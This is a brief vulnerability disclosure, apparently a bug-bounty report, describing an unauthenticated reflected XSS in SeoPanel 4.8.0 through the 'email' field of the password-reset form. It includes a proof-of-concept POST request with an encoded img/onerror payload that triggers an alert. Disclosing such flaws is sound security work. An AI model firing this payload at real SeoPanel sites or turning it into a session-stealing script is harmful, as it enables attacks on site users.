SeoPanel is vulnerable to reflect XSS due to lack of filtration of user-supplied [NO Autenticated User]
Environment
SeoPanel version: 4.8.0 Last Version
Parameter:
name="email"
PoC
POST /seo/seopanel/login.php?sec=forgot HTTP/1.1 sec=requestpass&email=test%40test.ttv3e5i%22%3e%3cimg%20src%3da%20onerror%3dalert("Xss")%3egcuak&code=OVJDT&login=
|